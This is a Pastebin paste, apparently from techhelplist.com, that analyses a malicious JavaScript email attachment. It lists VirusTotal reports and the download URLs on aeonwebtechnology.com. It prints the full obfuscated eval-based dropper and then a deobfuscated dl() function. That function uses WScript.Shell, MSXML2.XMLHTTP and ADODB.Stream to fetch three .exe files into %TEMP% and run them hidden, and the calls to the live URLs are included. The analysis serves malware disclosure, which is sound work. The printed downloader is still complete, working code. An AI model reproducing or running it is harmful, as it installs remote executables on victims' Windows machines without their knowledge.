API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 16th, 2014
324
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.93 KB | None | 0 0
raw download clone embed print report
  1. hi from techhelplist.com
  2.  
  3. from this .js file that was an email attachment:
  4. https://www.virustotal.com/en/file/4c39979f5f3f936b83734d30dc3e73cbcb553905f0723d2043eb4e161b999fee/analysis/
  5. contents of the javascript file above, the eval'ed string below.
  6.  
  7. downloads
  8. aeonwebtechnology.com/document.php?id=5450535E0E0B1701140C24171110074A070B09&rnd=9766301
  9. https://www.virustotal.com/en/file/2c277f6d5f060192a73e2b918d7c210a876cb11d064fdab1f483947df4d1156f/analysis/
  10.  
  11. aeonwebtechnology.com/document.php?id=5450535E0E0B1701140C24171110074A070B09&rnd=1803922
  12. https://www.virustotal.com/en/file/1dfe19a1c26df574c7e0ead778715801f2faa11112940307a28f98f8e0d2b35b/analysis/
  13.  
  14. aeonwebtechnology.com/document.php?id=5450535E0E0B1701140C24171110074A070B09&rnd=9442343
  15. https://www.virustotal.com/en/file/ce586cbc55026c338e73106157d6949a1b7cae69e2a278a0808372c6ef3a7384/analysis/
  16. -----------------------------------------------------------------------------
  17.  
  18. var a1='';function yo() { a1 += '0); }'; jlpb(); }; function qwry() { a1 += '17'; wqds(); }; function cbqj() { a1 += '074A'; wae(); }; function nf() { a1 += 'andEn'; ytd(); }; function yn() { a1 += 'bt'; yqr(); }; function pbwb() { a1 += 'y.c'; ai(); }; function ukw() { a1 += 'o.s'; ds(); }; function lh() { a1 += ' ='; zyk(); }; function ney() { a1 += '74A07'; cye(); }; function ek() { a1 += 's '; fhg(); }; function pbso() { a1 += '.writ'; tlud(); }; function kksf() { a1 += '22","'; iyfa(); }; function kkr() { a1 += 'tStri'; w(); }; function pzm() { a1 += '//aeo'; rgy(); }; function mj() { a1 += 'y.c'; us(); }; function pg() { a1 += 'en();'; wl(); }; function rzt() { a1 += '10'; cbqj(); }; function usq() { a1 += 'var '; wlil(); }; function kzns() { a1 += '",1'; ufe(); }; function ds() { a1 += 'en'; i(); }; function f() { a1 += ',1)'; fkcu(); }; function pwge() { a1 += 'id'; fvwf(); }; function naxa() { a1 += 'atch '; aep(); }; function ebm() { a1 += ' ('; vb(); }; function fn() { a1 += 'e)'; p(); }; function q() { a1 += 'ive'; sej(); }; function ikzi() { a1 += 'id=5'; zdlr(); }; function cajs() { a1 += 'ebtec'; qg(); }; function yizp() { a1 += '.p'; kepg(); }; function gzzv() { a1 += 'log'; pbwb(); }; function ytd() { a1 += 'vi'; aw(); }; function vq() { a1 += 'ocum'; tgxj(); }; function di() { a1 += '"%'; tb(); }; function hi() { a1 += ' Acti'; e(); }; function hlra() { a1 += ' { '; ccuw(); }; function jg() { a1 += 'har'; swvu(); }; function atho() { a1 += 'nw'; cajs(); }; function owfr() { a1 += 'ar w'; ek(); }; function vc() { a1 += 'nt'; qrtq(); }; function cye() { a1 += '0B'; qpp(); }; function fpe() { a1 += 'xa'; yizp(); }; function us() { a1 += 'om/d'; rjgj(); }; function rgy() { a1 += 'nwe'; twvd(); }; function faas() { a1 += '",1);'; cvpl(); }; function pxrd() { a1 += 'hp?'; ikzi(); }; function u() { a1 += 'r,f'; r(); }; function tb() { a1 += 'TEMP%'; mh(); }; function wl() { a1 += ' xa'; y(); }; function owbl() { a1 += 'nread'; gz(); }; function tgxj() { a1 += 'ent.'; rfqt(); }; function nv() { a1 += 'cri'; is(); }; function cibh() { a1 += '(f'; u(); }; function jlpb() { a1 += '; '; jgp(); }; function sr() { a1 += 'ol'; djk(); }; function a() { a1 += 'ct'; vu(); }; function vas() { a1 += 'fn'; le(); }; function jh() { a1 += 'MLHT'; kwvj(); }; function mh() { a1 += '")+St'; fl(); }; function qpp() { a1 += '09&'; gkt(); }; function xx() { a1 += 'xe"'; f(); }; function paqb() { a1 += '.exe'; kzns(); }; function tk() { a1 += 'fr,'; srcz(); }; function odw() { a1 += 'd=545'; n(); }; function qhwo() { a1 += '.e'; xx(); }; function twp() { a1 += '{ '; hlx(); }; function gd() { a1 += ' x'; ah(); }; function cgk() { a1 += '"8813'; rte(); }; function xk() { a1 += ' ('; py(); }; function oxd() { a1 += 'le('; vas(); }; function bw() { a1 += '("'; vse(); }; function i() { a1 += 'd()'; ubte(); }; function cp() { a1 += ' var'; t(); }; function gee() { a1 += '053'; ztj(); }; function hkf() { a1 += 'xa.op'; pg(); }; function ztj() { a1 += '5E0'; xpkt(); }; function m() { a1 += 'DB.'; pdw(); }; function yja() { a1 += 'tp:'; pzm(); }; function oq() { a1 += 'XObje'; izy(); }; function pvrl() { a1 += 'onse'; xh(); }; function bg() { a1 += 'nt.p'; pxrd(); }; function pmbi() { a1 += 'fun'; a(); }; function su() { a1 += '1100'; xrv(); }; function wlil() { a1 += 'xa '; ngmy(); }; function gkt() { a1 += 'rnd=9'; gcc(); }; function bbl() { eval(a1); }; function ufe() { a1 += ');'; bbl(); }; function g() { a1 += 'ti'; ey(); }; function qg() { a1 += 'hn'; sr(); }; function v() { a1 += '("WS'; nv(); }; function eip() { a1 += 'MS'; oh(); }; function uc() { a1 += ' { '; usq(); }; function rjgj() { a1 += 'oc'; swq(); }; function nqm() { a1 += 'o.o'; owbl(); }; function rwc() { a1 += '.Resp'; pvrl(); }; function xar() { a1 += 'onwe'; yn(); }; function o() { a1 += ' n'; wp(); }; function da() { a1 += '343",'; cgk(); }; function ccuw() { a1 += '}; }'; xc(); }; function srcz() { a1 += 'fals'; fn(); }; function te() { a1 += '"ADO'; m(); }; function fvwf() { a1 += '=54'; kes(); }; function ndyb() { a1 += ' ='; yuy(); }; function wp() { a1 += 'ew Ac'; g(); }; function ozc() { a1 += '140C2'; cg(); }; function jq() { a1 += 'T",'; tk(); }; function wutp() { a1 += 'if'; xk(); }; function wvu() { a1 += 'chang'; clqr(); }; function ysh() { a1 += 'd=180'; huzr(); }; function gh() { a1 += '877'; modc(); }; function cvpl() { a1 += ' dl'; bw(); }; function kepg() { a1 += 'osit'; x(); }; function fkcu() { a1 += '; d'; qdx(); }; function n() { a1 += '05'; xo(); }; function jpvw() { a1 += '{ xo.'; kzdc(); }; function s() { a1 += ' ='; rkf(); }; function vse() { a1 += 'ht'; ubn(); }; function bnd() { a1 += 'Exp'; nf(); }; function or() { a1 += '/ae'; xar(); }; function oh() { a1 += 'XM'; bzqo(); }; function rte() { a1 += '5061'; paqb(); }; function y() { a1 += '.type'; vel(); }; function zdlb() { a1 += '://a'; owhc(); }; function le() { a1 += ',2);'; gd(); }; function qj() { a1 += '09'; kc(); }; function jfz() { a1 += 'docu'; j(); }; function py() { a1 += 'xo.re'; jpri(); }; function ai() { a1 += 'om/d'; vq(); }; function zoq() { a1 += 'Obj'; iq(); }; function jbtt() { a1 += '.com/'; jfz(); }; function yuy() { a1 += '== '; h(); }; function x() { a1 += 'ion'; s(); }; function tro() { a1 += '40C'; zin(); }; function ior() { a1 += 'dy'; xkn(); }; function dac() { a1 += 'g.fro'; wxe(); }; function hbj() { a1 += '1",'; kur(); }; function vb() { a1 += 'rn > '; vsia(); }; function znr() { a1 += ' { v'; owfr(); }; function xvke() { a1 += 'E0E0'; ch(); }; function rm() { a1 += '630'; hbj(); }; function wae() { a1 += '070'; czlm(); }; function yrkj() { a1 += 'en'; kkr(); }; function pzxj() { a1 += '+fn;'; cp(); }; function ghq() { a1 += 'm"); '; hkf(); }; function agk() { a1 += 'ate'; wvu(); }; function xrv() { a1 += '74A'; sxxk(); }; function xl() { a1 += '40C24'; kfj(); }; function swvu() { a1 += 'Cod'; fc(); }; function izy() { a1 += 'ct("'; eip(); }; function kc() { a1 += '&rn'; ysh(); }; function ubte() { a1 += '; if'; ebm(); }; function yqr() { a1 += 'echno'; gzzv(); }; function huzr() { a1 += '39'; kksf(); }; function slyv() { a1 += 'save'; zrdh(); }; function fcdp() { a1 += '&rnd='; io(); }; function xo() { a1 += '35'; xvke(); }; function aw() { a1 += 'ronm'; yrkj(); }; function b() { a1 += '; }; '; mb(); }; function fc() { a1 += 'e(92)'; pzxj(); }; function sej() { a1 += 'XObj'; lszt(); }; function zrdh() { a1 += 'ToFi'; oxd(); }; function z() { a1 += 'l('; dn(); }; function iq() { a1 += 'ect('; te(); }; function ngzp() { a1 += '.X'; jh(); }; function p() { a1 += '; x'; ukw(); }; function kwvj() { a1 += 'TP");'; aoe(); }; function czlm() { a1 += 'B09'; fcdp(); }; function zin() { a1 += '2417'; ooc(); }; function ifgk() { a1 += '011'; tro(); }; function mb() { a1 += 'try '; jpvw(); }; function d() { a1 += 'w Act'; q(); }; function ubn() { a1 += 'tp'; zdlb(); }; function zm() { a1 += 'E0E0B'; qwry(); }; function zyk() { a1 += ' ws.'; bnd(); }; function h() { a1 += '4)'; uc(); }; function gtw() { a1 += '(); }'; b(); }; function kp() { a1 += 'St'; wnmo(); }; function aoe() { a1 += ' x'; nqm(); }; function modc() { a1 += '543.e'; nsua(); }; function cdtl() { a1 += '82459'; qhwo(); }; function twvd() { a1 += 'bt'; yeo(); }; function wnmo() { a1 += 'ate'; ndyb(); }; function vsia() { a1 += '0) '; twp(); }; function jijm() { a1 += ') { '; wutp(); }; function fl() { a1 += 'rin'; dac(); }; function r() { a1 += 'n,r'; rg(); }; function hlx() { a1 += 'ws.R'; taw(); }; function kfj() { a1 += '1711'; rzt(); }; function sxxk() { a1 += '070B'; qj(); }; function jpri() { a1 += 'ady'; kp(); }; function rfqt() { a1 += 'ph'; fpy(); }; function qrtq() { a1 += '.php?'; pwge(); }; function ah() { a1 += 'a.clo'; gayo(); }; function lszt() { a1 += 'ect'; v(); }; function clqr() { a1 += 'e = f'; yt(); }; function ey() { a1 += 've'; oq(); }; function ik() { a1 += 'xa.'; slyv(); }; function gz() { a1 += 'yst'; agk(); }; function kes() { a1 += '50535'; zm(); }; function ch() { a1 += 'B17'; ifgk(); }; function gcc() { a1 += '76'; rm(); }; function aep() { a1 += '(er)'; hlra(); }; function jij() { a1 += '"); v'; rc(); }; function tlud() { a1 += 'e(xo'; rwc(); }; function fag() { a1 += '"GE'; jq(); }; function vel() { a1 += ' = 1;'; vek(); }; function vek() { a1 += ' xa'; pbso(); }; function is() { a1 += 'pt.'; rqkg(); }; function bzqo() { a1 += 'L2'; ngzp(); }; function swq() { a1 += 'ume'; bg(); }; function mw() { a1 += 'on('; jijm(); }; function io() { a1 += '9442'; da(); }; function oyiw() { a1 += 'ology'; jbtt(); }; function fhg() { a1 += '= ne'; d(); }; function xkn() { a1 += '); '; fpe(); }; function owhc() { a1 += 'eo'; atho(); }; function djk() { a1 += 'og'; mj(); }; function fpy() { a1 += 'p?i'; odw(); }; function t() { a1 += ' x'; pbai(); }; function ngmy() { a1 += '= new'; hi(); }; function dn() { a1 += '"http'; euj(); }; function upmv() { a1 += '17011'; xl(); }; function yt() { a1 += 'uncti'; mw(); }; function iyfa() { a1 += '99'; gh(); }; function pdw() { a1 += 'Strea'; ghq(); }; function jgp() { a1 += '} c'; naxa(); }; function rdno() { a1 += 'n dl'; cibh(); }; function kzdc() { a1 += 'open('; fag(); }; function pbai() { a1 += 'o ='; o(); }; function euj() { a1 += ':/'; or(); }; function wxe() { a1 += 'mC'; jg(); }; function rg() { a1 += 'n)'; znr(); }; function xc() { a1 += '; d'; z(); }; function rc() { a1 += 'ar fn'; lh(); }; function vu() { a1 += 'io'; rdno(); }; function wqds() { a1 += '01'; ozc(); }; function ooc() { a1 += '11100'; ney(); }; function w() { a1 += 'ngs('; di(); }; function e() { a1 += 'veX'; zoq(); }; function nsua() { a1 += 'xe'; faas(); }; function xpkt() { a1 += 'E0B'; upmv(); }; function xh() { a1 += 'Bo'; ior(); }; function rkf() { a1 += ' 0; '; ik(); }; function lnj() { a1 += ',0,'; yo(); }; function gayo() { a1 += 'se'; gtw(); }; function c() { a1 += 'ell'; jij(); }; function rqkg() { a1 += 'Sh'; c(); }; function j() { a1 += 'me'; vc(); }; function kur() { a1 += '"662'; cdtl(); }; function cg() { a1 += '4171'; su(); }; function taw() { a1 += 'un(fn'; lnj(); }; function zdlr() { a1 += '45'; gee(); }; function qdx() { a1 += 'l("ht'; yja(); }; function yeo() { a1 += 'echn'; oyiw(); }; pmbi();
  19.  
  20. ---------------------------------------------------------------------------
  21.  
  22.  
  23. function dl(fr, fn, rn){
  24. var ws = new ActiveXObject("WScript.Shell");
  25. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
  26. var xo = new ActiveXObject("MSXML2.XMLHTTP");
  27. xo.onreadystatechange = function (){
  28. if (xo.readyState === 4){
  29. var xa = new ActiveXObject("ADODB.Stream");
  30. xa.open();
  31. xa.type = 1;
  32. xa.write(xo.ResponseBody);
  33. xa.position = 0;
  34. xa.saveToFile(fn, 2);
  35. xa.close();
  36. }
  37. ;
  38. }
  39. ;
  40. try {
  41. xo.open("GET", fr, false);
  42. xo.send();
  43. if (rn > 0){
  44. ws.Run(fn, 0, 0);
  45. }
  46. ;
  47. }
  48. catch (er){
  49. }
  50. ;
  51. }
  52. ;
  53. dl("
  54. http://aeonwebtechnology.com/document.php?id=5450535E0E0B1701140C24171110074A070B09&rnd=97
  55. 66301", "66282459.exe", 1);
  56. dl("
  57. http://aeonwebtechnology.com/document.php?id=5450535E0E0B1701140C24171110074A070B09&rnd=18
  58. 03922", "99877543.exe", 1);
  59. dl("
  60. http://aeonwebtechnology.com/document.php?id=5450535E0E0B1701140C24171110074A070B09&rnd=94
  61. 42343", "88135061.exe", 1);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!